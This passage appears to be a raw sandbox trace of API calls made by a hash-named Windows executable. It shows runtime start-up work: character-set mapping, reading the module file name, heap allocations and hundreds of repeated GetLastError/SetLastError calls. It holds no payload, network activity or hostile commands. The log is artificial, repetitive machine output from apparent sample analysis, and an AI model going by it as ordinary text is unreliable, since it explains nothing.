!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0099.402] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0099.402] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17-9±\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0099.403] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x419a90, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe")) returned 0x62 [0099.403] GetLastError () returned 0x0 [0099.403] SetLastError (dwErrCode=0x0) [0099.403] GetLastError () returned 0x0 [0099.403] SetLastError (dwErrCode=0x0) [0099.403] GetLastError () returned 0x0 [0099.403] SetLastError (dwErrCode=0x0) [0099.403] GetLastError () returned 0x0 [0099.403] SetLastError (dwErrCode=0x0) [0099.403] GetLastError () returned 0x0 [0099.403] SetLastError (dwErrCode=0x0) [0099.403] GetLastError () returned 0x0 [0099.403] SetLastError (dwErrCode=0x0) [0099.403] GetLastError () returned 0x0 [0099.403] SetLastError (dwErrCode=0x0) [0099.403] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.404] SetLastError (dwErrCode=0x0) [0099.404] GetLastError () returned 0x0 [0099.405] SetLastError (dwErrCode=0x0) [0099.405] GetLastError () returned 0x0 [0099.405] SetLastError (dwErrCode=0x0) [0099.405] GetLastError () returned 0x0 [0099.405] SetLastError (dwErrCode=0x0) [0099.405] GetLastError () returned 0x0 [0099.405] SetLastError (dwErrCode=0x0) [0099.405] GetLastError () returned 0x0 [0099.405] SetLastError (dwErrCode=0x0) [0099.405] GetLastError () returned 0x0 [0099.405] SetLastError (dwErrCode=0x0) [0099.405] GetLastError () returned 0x0 [0099.405] SetLastError (dwErrCode=0x0) [0099.405] GetLastError () returned 0x0 [0099.405] SetLastError (dwErrCode=0x0) [0099.405] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.406] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.406] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.406] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.406] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.406] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.406] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.406] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.406] GetLastError () returned 0x0 [0099.406] SetLastError (dwErrCode=0x0) [0099.407] GetLastError () returned 0x0 [0099.407] SetLastError (dwErrCode=0x0) [0099.407] GetLastError () returned 0x0 [0099.407] SetLastError (dwErrCode=0x0) [0099.407] GetLastError () returned 0x0 [0099.407] SetLastError (dwErrCode=0x0) [0099.407] GetLastError () returned 0x0 [0099.407] SetLastError (dwErrCode=0x0) [0099.407] GetLastError () returned 0x0 [0099.407] SetLastError (dwErrCode=0x0) [0099.407] GetLastError () returned 0x0 [0099.407] SetLastError (dwErrCode=0x0) [0099.407] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.408] SetLastError (dwErrCode=0x0) [0099.408] GetLastError () returned 0x0 [0099.409] SetLastError (dwErrCode=0x0) [0099.409] GetLastError () returned 0x0 [0099.409] SetLastError (dwErrCode=0x0) [0099.409] GetLastError () returned 0x0 [0099.409] SetLastError (dwErrCode=0x0) [0099.409] GetLastError () returned 0x0 [0099.409] SetLastError (dwErrCode=0x0) [0099.409] GetLastError () returned 0x0 [0099.409] SetLastError (dwErrCode=0x0) [0099.409] GetLastError () returned 0x0 [0099.409] SetLastError (dwErrCode=0x0) [0099.409] GetLastError () returned 0x0 [0099.409] SetLastError (dwErrCode=0x0) [0099.409] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.410] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.410] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.410] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.410] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.410] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.410] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.410] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.410] GetLastError () returned 0x0 [0099.410] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.411] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.411] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.411] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.411] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.411] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.411] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.411] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.411] SetLastError (dwErrCode=0x0) [0099.411] GetLastError () returned 0x0 [0099.412] SetLastError (dwErrCode=0x0) [0099.412] GetLastError () returned 0x0 [0099.412] SetLastError (dwErrCode=0x0) [0099.412] GetLastError () returned 0x0 [0099.412] SetLastError (dwErrCode=0x0) [0099.412] GetLastError () returned 0x0 [0099.412] SetLastError (dwErrCode=0x0) [0099.412] GetLastError () returned 0x0 [0099.412] SetLastError (dwErrCode=0x0) [0099.412] GetLastError () returned 0x0 [0099.412] SetLastError (dwErrCode=0x0) [0099.412] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.413] SetLastError (dwErrCode=0x0) [0099.413] GetLastError () returned 0x0 [0099.414] SetLastError (dwErrCode=0x0) [0099.414] GetLastError () returned 0x0 [0099.414] SetLastError (dwErrCode=0x0) [0099.414] GetLastError () returned 0x0 [0099.414] SetLastError (dwErrCode=0x0) [0099.414] GetLastError () returned 0x0 [0099.414] SetLastError (dwErrCode=0x0) [0099.416] GetLastError () returned 0x0 [0099.416] SetLastError (dwErrCode=0x0) [0099.416] GetLastError () returned 0x0 [0099.416] SetLastError (dwErrCode=0x0) [0099.416] GetLastError () returned 0x0 [0099.417] SetLastError (dwErrCode=0x0) [0099.417] GetLastError () returned 0x0 [0099.417] SetLastError (dwErrCode=0x0) [0099.417] GetLastError () returned 0x0 [0099.417] SetLastError (dwErrCode=0x0) [0099.417] GetLastError () returned 0x0 [0099.417] SetLastError (dwErrCode=0x0) [0099.417] GetLastError () returned 0x0 [0099.417] SetLastError (dwErrCode=0x0) [0099.417] GetLastError () returned 0x0 [0099.417] SetLastError (dwErrCode=0x0) [0099.417] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x0, Size=0x6b) returned 0x4af1710 [0099.417] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.418] SetLastError (dwErrCode=0x0) [0099.418] GetLastError () returned 0x0 [0099.419] SetLastError (dwErrCode=0x0) [0099.419] GetLastError () returned 0x0 [0099.428] SetLastError (dwErrCode=0x0) [0099.428] GetLastError () returned 0x0 [0099.428] SetLastError (dwErrCode=0x0) [0099.428] GetLastError () returned 0x0 [0099.428] SetLastError (dwErrCode=0x0) [0099.428] GetLastError () returned 0x0 [0099.428] SetLastError (dwErrCode=0x0) [0099.429] GetLastError () returned 0x0 [0099.429] SetLastError (dwErrCode=0x0) [0099.429] GetLastError () returned 0x0 [0099.429] SetLastError (dwErrCode=0x0) [0099.429] GetLastError () returned 0x0 [0099.429] SetLastError (dwErrCode=0x0) [0099.429] GetLastError () returned 0x0 [0099.429] SetLastError (dwErrCode=0x0) [0099.429] GetLastError () returned 0x0 [0099.429] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.430] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.430] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.430] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.430] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.430] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.430] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.430] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.430] SetLastError (dwErrCode=0x0) [0099.430] GetLastError () returned 0x0 [0099.431] SetLastError (dwErrCode=0x0) [0099.431] GetLastError () returned 0x0 [0099.431] SetLastError (dwErrCode=0x0) [0099.431] GetLastError () returned 0x0 [0099.431] SetLastError (dwErrCode=0x0) [0099.431] GetLastError () returned 0x0 [0099.431] SetLastError (dwErrCode=0x0) [0099.431] GetLastError () returned 0x0 [0099.431] SetLastError (dwErrCode=0x0) [0099.431] GetLastError () returned 0x0 [0099.431] SetLastError (dwErrCode=0x0) [0099.431] GetLastError () returned 0x0 [0099.431] SetLastError (dwErrCode=0x0) [0099.431] GetLastError () returned 0x0 [0099.432] SetLastError (dwErrCode=0x0) [0099.432] GetLastError () returned 0x0 [0099.432] SetLastError (dwErrCode=0x0) [0099.432] GetLastError () returned 0x0 [0099.432] SetLastError (dwErrCode=0x0) [0099.432] GetLastError () returned 0x0 [0099.432] SetLastError (dwErrCode=0x0) [0099.432] GetLastError () returned 0x0 [0099.432] SetLastError (dwErrCode=0x0) [0099.432] GetLastError () returned 0x0 [0099.432] SetLastError (dwErrCode=0x0) [0099.432] GetLastError () returned 0x0 [0099.432] SetLastError (dwErrCode=0x0) [0099.432] GetLastError () returned 0x0 [0099.432] SetLastError (dwErrCode=0x0) [0099.432] GetLastError () returned 0x0 [0099.433] SetLastError (dwErrCode=0x0) [0099.433] GetLastError () returned 0x0 [0099.433] SetLastError (dwErrCode=0x0) [0099.433] GetLastError () returned 0x0 [0099.433] SetLastError (dwErrCode=0x0) [0099.433] GetLastError () returned 0x0 [0099.433] SetLastError (dwErrCode=0x0) [0099.433] GetLastError () returned 0x0 [0099.433] SetLastError (dwErrCode=0x0) [0099.433] GetLastError () returned 0x0 [0099.433] SetLastError (dwErrCode=0x0) [0099.433] GetLastError () returned 0x0 [0099.433] SetLastError (dwErrCode=0x0) [0099.433] GetLastError () returned 0x0 [0099.433] SetLastError (dwErrCode=0x0) [0099.433] GetLastError () returned 0x0 [0099.434] SetLastError (dwErrCode=0x0) [0099.434] GetLastError () returned 0x0 [0099.434] SetLastError (dwErrCode=0x0) [0099.434] GetLastError () returned 0x0 [0099.434] SetLastError (dwErrCode=0x0) [0099.434] GetLastError () returned 0x0 [0099.434] SetLastError (dwErrCode=0x0) [0099.434] GetLastError () returned 0x0 [0099.434] SetLastError (dwErrCode=0x0) [0099.434] GetLastError () returned 0x0 [0099.434] SetLastError (dwErrCode=0x0) [0099.434] GetLastError () returned 0x0 [0099.434] SetLastError (dwErrCode=0x0) [0099.434] GetLastError () returned 0x0 [0099.434] SetLastError (dwErrCode=0x0) [0099.434] GetLastError () returned 0x0 [0099.435] SetLastError (dwErrCode=0x0) [0099.435] GetLastError () returned 0x0 [0099.435] SetLastError (dwErrCode=0x0) [0099.435] GetLastError () returned 0x0 [0099.435] SetLastError (dwErrCode=0x0) [0099.435] GetLastError () returned 0x0 [0099.435] SetLastError (dwErrCode=0x0) [0099.435] GetLastError () returned 0x0 [0099.435] SetLastError (dwErrCode=0x0) [0099.435] GetLastError () returned 0x0 [0099.435] SetLastError (dwErrCode=0x0) [0099.435] GetLastError () returned 0x0 [0099.435] SetLastError (dwErrCode=0x0) [0099.435] GetLastError () returned 0x0 [0099.436] SetLastError (dwErrCode=0x0) [0099.436] GetLastError () returned 0x0 [0099.436] SetLastError (dwErrCode=0x0) [0099.436] GetLastError () returned 0x0 [0099.436] SetLastError (dwErrCode=0x0) [0099.436] GetLastError () returned 0x0 [0099.436] SetLastError (dwErrCode=0x0) [0099.436] GetLastError () returned 0x0 [0099.436] SetLastError (dwErrCode=0x0) [0099.436] GetLastError () returned 0x0 [0099.436] SetLastError (dwErrCode=0x0) [0099.436] GetLastError () returned 0x0 [0099.436] SetLastError (dwErrCode=0x0) [0099.436] GetLastError () returned 0x0 [0099.436] SetLastError (dwErrCode=0x0) [0099.436] GetLastError () returned 0x0 [0099.437] SetLastError (dwErrCode=0x0) [0099.437] GetLastError () returned 0x0 [0099.437] SetLastError (dwErrCode=0x0) [0099.437] GetLastError () returned 0x0 [0099.437] SetLastError (dwErrCode=0x0) [0099.437] GetLastError () returned 0x0 [0099.437] SetLastError (dwErrCode=0x0) [0099.437] GetLastError () returned 0x0 [0099.437] SetLastError (dwErrCode=0x0) [0099.437] GetLastError () returned 0x0 [0099.437] SetLastError (dwErrCode=0x0) [0099.438] GetLastError () returned 0x0 [0099.438] SetLastError (dwErrCode=0x0) [0099.438] GetLastError () returned 0x0 [0099.438] SetLastError (dwErrCode=0x0) [0099.438] GetLastError () returned 0x0 [0099.438] SetLastError (dwErrCode=0x0) [0099.438] GetLastError () returned 0x0 [0099.438] SetLastError (dwErrCode=0x0) [0099.438] GetLastError () returned 0x0 [0099.438] SetLastError (dwErrCode=0x0) [0099.438] GetLastError () returned 0x0 [0099.438] SetLastError (dwErrCode=0x0) [0099.438] GetLastError () returned 0x0 [0099.438] SetLastError (dwErrCode=0x0) [0099.438] GetLastError () returned 0x0 [0099.439] SetLastError (dwErrCode=0x0) [0099.439] GetLastError () returned 0x0 [0099.439] SetLastError (dwErrCode=0x0) [0099.439] GetLastError () returned 0x0 [0099.439] SetLastError (dwErrCode=0x0) [0099.439] GetLastError () returned 0x0 [0099.439] SetLastError (dwErrCode=0x0) [0099.439] GetLastError () returned 0x0 [0099.439] SetLastError (dwErrCode=0x0) [0099.439] GetLastError () returned 0x0 [0099.439] SetLastError (dwErrCode=0x0) [0099.440] GetLastError () returned 0x0 [0099.440] SetLastError (dwErrCode=0x0) [0099.440] GetLastError () returned 0x0 [0099.440] SetLastError (dwErrCode=0x0) [0099.440] GetLastError () returned 0x0 [0099.440] SetLastError (dwErrCode=0x0) [0099.440] GetLastError () returned 0x0 [0099.440] SetLastError (dwErrCode=0x0) [0099.440] GetLastError () returned 0x0 [0099.440] SetLastError (dwErrCode=0x0) [0099.440] GetLastError () returned 0x0 [0099.440] SetLastError (dwErrCode=0x0) [0099.440] GetLastError () returned 0x0 [0099.440] SetLastError (dwErrCode=0x0) [0099.440] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x90) returned 0x4af1788 [0099.440] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x1f) returned 0x4af1820 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x2e) returned 0x4af1848 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x37) returned 0x4af1880 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x3c) returned 0x4af18c0 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x31) returned 0x4af1908 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x14) returned 0x4af1948 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x24) returned 0x4af1968 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0xd) returned 0x4af1998 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x1d) returned 0x4af19b0 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x31) returned 0x4af19d8 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x15) returned 0x4af1a18 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x17) returned 0x4af1a38 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0xe) returned 0x4af1a58 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x69) returned 0x4af1a70 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x3e) returned 0x4af1ae8 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x1b) returned 0x4af1b30 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x1d) returned 0x4af1b58 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x48) returned 0x4af1b80 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x12) returned 0x4af1bd0 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x18) returned 0x4af1bf0 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x1b) returned 0x4af1c10 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x24) returned 0x4af1c38 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x29) returned 0x4af1c68 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x1e) returned 0x4af1ca0 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x6b) returned 0x4af1cc8 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x17) returned 0x4af1d40 [0099.441] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0xf) returned 0x4af1d60 [0099.442] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x16) returned 0x4af1d78 [0099.442] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x2a) returned 0x4af1d98 [0099.442] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x29) returned 0x4af1dd0 [0099.442] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x12) returned 0x4af1e08 [0099.442] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x21) returned 0x4af1e28 [0099.442] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x16) returned 0x4af1e58 [0099.442] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x22) returned 0x4af1e78 [0099.442] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x12) returned 0x4af1ea8 [0099.442] HeapFree (in: hHeap=0x4af0000, dwFlags=0x0, lpMem=0x4af0fd0 | out: hHeap=0x4af0000) returned 1 [0099.444] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0099.444] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x800) returned 0x4af1ec8 [0099.444] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x80) returned 0x4af0fd0 [0099.444] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4052ea) returned 0x0 [0099.445] RtlSizeHeap (HeapHandle=0x4af0000, Flags=0x0, MemoryPointer=0x4af0fd0) returned 0x80 [0099.445] GetLastError () returned 0x0 [0099.445] SetLastError (dwErrCode=0x0) [0099.446] GetLastError () returned 0x0 [0099.446] SetLastError (dwErrCode=0x0) [0099.446] GetLastError () returned 0x0 [0099.446] SetLastError (dwErrCode=0x0) [0099.446] GetLastError () returned 0x0 [0099.446] SetLastError (dwErrCode=0x0) [0099.446] GetLastError () returned 0x0 [0099.446] SetLastError (dwErrCode=0x0) [0099.446] GetLastError () returned 0x0 [0099.446] SetLastError (dwErrCode=0x0) [0099.446] GetLastError () returned 0x0 [0099.446] SetLastError (dwErrCode=0x0) [0099.446] GetLastError () returned 0x0 [0099.446] SetLastError (dwErrCode=0x0) [0099.446] GetLastError () returned 0x0 [0099.447] SetLastError (dwErrCode=0x0) [0099.447] GetLastError () returned 0x0 [0099.447] SetLastError (dwErrCode=0x0) [0099.447] GetLastError () returned 0x0 [0099.447] SetLastError (dwErrCode=0x0) [0099.447] GetLastError () returned 0x0 [0099.447] SetLastError (dwErrCode=0x0) [0099.447] GetLastError () returned 0x0 [0099.447] SetLastError (dwErrCode=0x0) [0099.447] GetLastError () returned 0x0 [0099.448] SetLastError (dwErrCode=0x0) [0099.448] GetLastError () returned 0x0 [0099.448] SetLastError (dwErrCode=0x0) [0099.448] GetLastError () returned 0x0 [0099.448] SetLastError (dwErrCode=0x0) [0099.448] GetLastError () returned 0x0 [0099.448] SetLastError (dwErrCode=0x0) [0099.448] GetLastError () returned 0x0 [0099.448] SetLastError (dwErrCode=0x0) [0099.448] GetLastError () returned 0x0 [0099.448] SetLastError (dwErrCode=0x0) 